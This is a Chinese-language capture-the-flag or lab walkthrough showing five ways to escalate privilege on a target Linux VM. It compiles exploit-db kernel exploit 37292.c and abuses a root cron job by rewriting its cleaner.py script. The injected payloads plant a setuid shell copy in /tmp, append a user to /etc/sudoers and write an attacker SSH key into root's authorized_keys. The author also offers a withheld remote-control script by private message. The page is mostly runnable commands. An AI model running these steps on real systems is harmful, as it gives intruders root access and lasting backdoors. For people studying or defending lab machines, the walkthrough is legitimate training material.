二、提权
1.提权方法1
ssh登录获取bash shell
python -c 'import pty;pty.spawn("/bin/bash")'
内核版本
复制过来
开启网页下载
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
┌──(root㉿kali)-[~]
└─# python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
回到靶机ssh,发现断开了,判断应该是设置了定时任务什么的,不太清楚,只能先提权看看了
重新ssh登录
gcc 37292.c -o muma1 ./muma1
又断开了,好恶心。
这个常规方法会被cronb定时执行影响,所以我们要尝试更多可能
2.提权方法2
我们查看cronb日志
find / -name cronlog 2>/dev/null ---查看计划任务日志信息
每间隔2分钟执行一次任务
我倒要看看他执行的是什么文件
find / -name cleaner.py 2>/dev/null ---查看文件在哪儿
清除/tmp下的所有文件,并且推出程序
好家伙每两分钟清除/tmp下的所有文件,并且退出当前tty,
那么肯定比我权限都高,我们就用这个执行脚本获取shell
vim写入不了
我们只能用vi或nano写入
find / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举所有可写入和执行权限的文件
find / -writable 2>/dev/null ---枚举所有可写入权限的文件
先注释掉这句
这样我们就不会掉了
我们慢慢写
这里要写入要给python远控的脚本
脚本不能直接展示,因为一些大家dddd,可以私信我们的要
此处省略远控代码注入
拿到shell了!
3.提权方法3
我们ssh上去
python -c 'import pty; pty.spawn("/bin/bash")'
创建root可执行程序,获得root权限
nano /lib/log/cleaner.py
#!/usr/bin/python import os import sys try: os.system('cp /bin/sh /tmp/ou') os.system('chmod u+s /tmp/ou') except: sys.exit()
断开后重新ssh上去看看
获得bash shell
4.提权方法4
或者编辑脚本以将用户溢出添加到sudoers文件中可以sudo su到root用户:
nano /lib/log/cleaner.py
#!/usr/bin/python import os import sys try: os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers') except: sys.exit()
sudo su - root 得到root权限
5.root免密登录的方法
在kali本地root的~/.ssh下写入key
cd ~/.ssh
cat id_rsa.pub
没有生成一个
ssh-keygen
空密码
把rsa的key内容写入进靶机的/root/.ssh/里面
cat id_rsa.pub
登入靶机
注意执行这个shell需要
python -c 'import pty; pty.spawn("/bin/bash")'
nano /lib/log/cleaner.py
#!/usr/bin/python import os import sys try: os.system(mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD6jUb2+l9/eqOPZ9fbqx5Q3GMjLeHkxPTzomODJA02yDOzxINVxTVfGey7oae+6CqTJZLobypXXD3sTm3oBUKxZxT7dfKZ09ds1F2GK6MdXXWqLI0FqpBCtbYxO9UNIOD9a26OreHHt5t6/wM4oxf95UqNQDJ1/xAlcXPkpOIUCzBKrRnt59TmJycVAGhyZnyBT6ybgacaQDUoS6ifUzRr5xXTCvDDnSQ0Vu0FepRXf1rB9L7f3gCz7HWEU3AkGVnOEoCwtddaHFPF3r6cO7KzWqwG0aDO4sxdbR0WfLqAoUrI6Vkob0IRkz0ZBkmA7K/Ew2s8E5xH53kRV2fPDa3x1S9/z+nPZDma1yYu4UjoWsIXz5+iYU0dYS8UcolEXFwH4f2zIbvQy1JnTc6NnJ/TDsdUMXmtye5VS36reczIvbbRCTz0k+ZiJAooh2Z53sS4BZQ4Sk3XMokwlDy61JFoDdqflXs3koi+bX05aT+Sc9Pdh2sbNK7WOTqQJyOmceU= root@kali" >> /root/.ssh/authorized_keys) except: sys.exit()
等他计划任务执行
断开了证明执行了
等ssh起来
总结
这里展示了五种提权方法,基本覆盖了常用的内网各种姿势,希望大家学有所成,请不要用于其他渠道。
特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。
